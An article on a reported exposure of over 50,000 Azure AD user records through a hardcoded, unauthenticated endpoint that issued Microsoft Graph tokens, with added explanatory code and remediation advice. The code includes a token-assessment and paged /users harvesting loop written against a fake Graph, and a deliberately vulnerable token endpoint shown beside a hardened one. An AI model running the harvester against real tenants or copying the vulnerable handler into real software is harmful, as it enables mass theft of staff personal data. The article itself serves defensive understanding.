A security incident reported by CloudSEK's BeVigil platform exposed more than 50,000 Azure Active Directory (AD, now Microsoft Entra ID) user records through a hardcoded, unauthenticated API endpoint embedded in a JavaScript file. The affected organization operates in the aviation industry, and the finding points to serious weaknesses in how its identity infrastructure was secured.
The endpoint was publicly reachable and required no authentication, so it continuously leaked data on both existing and newly onboarded users. Its URL was hardcoded in a JavaScript bundle served by a web application, which means anyone who read the bundle could find it. Rather than returning data directly, the endpoint handed out Microsoft Graph API access tokens carrying elevated permissions, notably User.Read.All and AccessReview.Read.All. User.Read.All allows reading the full profile of every user in the tenant, and AccessReview.Read.All exposes identity governance (access review) data; the records included names, job titles, email addresses, and contact details, exactly the material a social engineering campaign starts from. The vulnerability was identified on May 30, 2025. Because a public URL with no authentication effectively became a credential for the whole directory, the exposure sharply raises the risk of targeted attacks against high-profile individuals in the organization.
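What a practitioner does with a token obtained from such an endpoint, as an added example that is not code from the CloudSEK report or the affected application: decode the token to see which Graph permissions it carries and whether it is app-only or delegated, then walk the paged /users listing the way an automated harvester would. The token, tenant id, Graph responses and user records are all constructed here; the real Graph call is asynchronous (fetch), modelled by a synchronous callback so the example runs offline.

```javascript
// Added example, not code from the CloudSEK report or the affected application.
// Token, tenant id, endpoint responses and user records are CONSTRUCTED.

// Application-level permissions that grant tenant-wide reads of identity data.
const HIGH_IMPACT = new Set([
  'User.Read.All', 'User.ReadWrite.All', 'Directory.Read.All',
  'Directory.ReadWrite.All', 'AccessReview.Read.All', 'Group.Read.All',
]);

// base64url without padding, as used in JWS compact serialisation.
function b64url(obj) {
  return Buffer.from(JSON.stringify(obj)).toString('base64')
    .replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}

// Decode a JWT payload without verifying the signature. We are the *holder* of a
// leaked token, not its verifier; the claims tell us what it is good for.
function decodeJwtPayload(token) {
  const parts = token.split('.');
  if (parts.length !== 3) throw new Error('not a JWS compact token');
  const b64 = parts[1].replace(/-/g, '+').replace(/_/g, '/');
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

// App-only (client credentials) tokens list permissions in `roles`; delegated
// tokens list them in `scp`. App-only plus User.Read.All reads the whole tenant
// with no user in the loop at all.
function assessToken(token) {
  const p = decodeJwtPayload(token);
  const appOnly = Array.isArray(p.roles) && !p.scp;
  const perms = appOnly ? p.roles : String(p.scp || '').split(' ').filter(Boolean);
  return {
    appOnly,
    audience: p.aud,
    tenant: p.tid,
    perms,
    risky: perms.filter((x) => HIGH_IMPACT.has(x)),
  };
}

// Enumerate /users, following @odata.nextLink until the last page. fetchPage is
// injected so the loop can be exercised against the fake Graph below.
function harvestUsers(token, fetchPage, select = 'displayName,jobTitle,mail,mobilePhone') {
  let url = `https://graph.microsoft.com/v1.0/users?$select=${select}&$top=999`;
  const users = [];
  while (url) {
    const page = fetchPage(url, { headers: { Authorization: `Bearer ${token}` } });
    users.push(...page.value);
    url = page['@odata.nextLink']; // undefined on the final page
  }
  return users;
}

// CONSTRUCTED stand-in for Graph: serves the given pages in order, rejects
// requests without a bearer token, and chains pages with @odata.nextLink.
function fakeGraph(pages) {
  let served = 0;
  return (url, opts) => {
    if (!/^Bearer \S+/.test(opts.headers.Authorization || '')) throw new Error('401 Unauthorized');
    const value = pages[served++];
    return served < pages.length
      ? { value, '@odata.nextLink': `https://graph.microsoft.com/v1.0/users?$skiptoken=page${served}` }
      : { value };
  };
}

// CONSTRUCTED app-only token of the kind an unauthenticated endpoint might
// return. Header and payload are realistic; the signature is a placeholder.
const SAMPLE_TOKEN = [
  b64url({ typ: 'JWT', alg: 'RS256' }),
  b64url({
    aud: 'https://graph.microsoft.com',
    tid: '00000000-0000-0000-0000-000000000000',
    idtyp: 'app',
    roles: ['User.Read.All', 'AccessReview.Read.All'],
    exp: 1748600000,
  }),
  'placeholder-signature',
].join('.');

// CONSTRUCTED directory pages holding the kind of PII the report describes.
const SAMPLE_PAGES = [
  [{ displayName: 'A. Example', jobTitle: 'Chief Pilot', mail: 'a.example@example.test', mobilePhone: '+1 555 0100' },
   { displayName: 'B. Example', jobTitle: 'IT Administrator', mail: 'b.example@example.test', mobilePhone: null }],
  [{ displayName: 'C. Example', jobTitle: 'Finance Director', mail: 'c.example@example.test', mobilePhone: '+1 555 0102' }],
];

if (typeof require !== 'undefined' && require.main === module) {
  const a = assessToken(SAMPLE_TOKEN);
  console.log(`app-only=${a.appOnly} risky=${a.risky.join(',')}`);
  console.log(`harvested ${harvestUsers(SAMPLE_TOKEN, fakeGraph(SAMPLE_PAGES)).length} users`);
}
```

The `roles` versus `scp` distinction is the first thing to check on a leaked Graph token: a delegated token is bounded by the signed-in user's own rights, whereas an app-only token with User.Read.All reads every account in the tenant, and the paging loop shows how little code it takes to pull the whole directory once such a token is in hand.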
The ramifications extend beyond data visibility to serious security and compliance risk. Attackers gain a wider attack surface: a complete, current directory listing supports reconnaissance for privilege escalation, identity theft, and convincing, well-targeted phishing. Given the frequently cited estimate that social engineering features in 98% of cyberattacks, exposed user information of this kind is a substantial threat to organizational security.
Violations of data privacy regulations such as GDPR and CCPA are likely, given the scale of personally identifiable information exposed. Organizations managing sensitive identity data face intense regulatory scrutiny and potential fines when they fail to adequately protect API tokens and user information.
From a technical perspective, exposing such tokens enables unauthorized, automated harvesting of the Azure AD directory: with a valid bearer token and a paged request against the Graph /users endpoint, a script can enumerate every account. The Microsoft Graph API itself enforces OAuth 2.0 bearer authentication; what failed here was the application's own token-issuing endpoint, which performed no authentication before handing out tokens carrying the application's Graph permissions. A hardcoded endpoint in a client-side bundle is by definition public, so the missing server-side check amounted to publishing those privileges to anyone who asked, a stark reminder of the consequences of overlooking basic security configuration.
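The shape of the flaw beside one way to close it, as an added example that is not the affected application's code. The route names, the `getAppToken` and `graphGet` helpers, the session store and the directory record are assumptions made for illustration; the point is that a token-minting endpoint with no caller authentication is a public credential, while the hardened handler authenticates the caller, keeps the token on the server, and returns only the fields the UI needs.

```javascript
// Added example, not the affected application's code. /api/graph-token,
// getAppToken, graphGet, the session store and the directory are ASSUMPTIONS.

// --- Vulnerable: anyone who reads the bundle can mint an app-only Graph token ---
// getAppToken models the client-credentials call the backend makes with its own
// client secret; the token it returns carries the app's *application*
// permissions (e.g. User.Read.All), which are not scoped to any user.
function vulnerableTokenHandler(_req, getAppToken) {
  // No session check, no authorization check: the endpoint is public, and the
  // raw token goes straight to whoever called it.
  return { status: 200, body: { access_token: getAppToken() } };
}

// --- Hardened: authenticate the caller, keep the token server-side, narrow the data ---
const PROFILE_FIELDS = ['displayName', 'jobTitle', 'mail'];

function hardenedProfileHandler(req, { getAppToken, graphGet, sessions }) {
  const session = sessions.get(req.cookies && req.cookies.sid);
  if (!session) return { status: 401, body: { error: 'sign in required' } };

  // Only the caller's own object, only the fields the UI needs. The token never
  // leaves this function, so the bundle cannot leak it and the browser cannot
  // replay it against other Graph endpoints.
  const url = `https://graph.microsoft.com/v1.0/users/${encodeURIComponent(session.userId)}`
    + `?$select=${PROFILE_FIELDS.join(',')}`;
  const user = graphGet(url, getAppToken());
  const body = Object.fromEntries(PROFILE_FIELDS.map((f) => [f, user[f] ?? null]));
  return { status: 200, body };
}

// CONSTRUCTED fixtures so the handlers can run offline. The directory holds one
// record with more fields than the UI is allowed to see.
const directory = {
  'u-1': { id: 'u-1', displayName: 'Ada Example', jobTitle: 'Pilot',
           mail: 'ada@example.test', mobilePhone: '+1 555 0100' },
};
const fixtures = {
  getAppToken: () => 'app-only-token-SECRET',
  graphGet: (url, token) => {
    if (token !== 'app-only-token-SECRET') throw new Error('401 from Graph');
    const id = decodeURIComponent(new URL(url).pathname.split('/').pop());
    return directory[id];
  },
  sessions: new Map([['sid-ok', { userId: 'u-1' }]]),
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', JSON.stringify(vulnerableTokenHandler({}, fixtures.getAppToken)));
  console.log('hardened, anonymous:', JSON.stringify(hardenedProfileHandler({}, fixtures)));
  console.log('hardened, signed in:', JSON.stringify(hardenedProfileHandler({ cookies: { sid: 'sid-ok' } }, fixtures)));
}
```

Two further controls belong alongside the handler and are not shown in code: grant the app registration the narrowest Graph permission that satisfies the feature (User.ReadBasic.All rather than User.Read.All if only names and addresses are needed), and scan built JavaScript bundles for hardcoded endpoints and secrets before they ship, which is the class of check that surfaced this incident.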
The incident underlines the need for strong security practices in managing identity data: any endpoint that can mint or relay tokens must authenticate its callers, tokens should stay on the server rather than being handed to the browser, Graph permissions should be granted at the narrowest scope the application actually needs, and shipped JavaScript bundles should be scanned for hardcoded endpoints and secrets before release.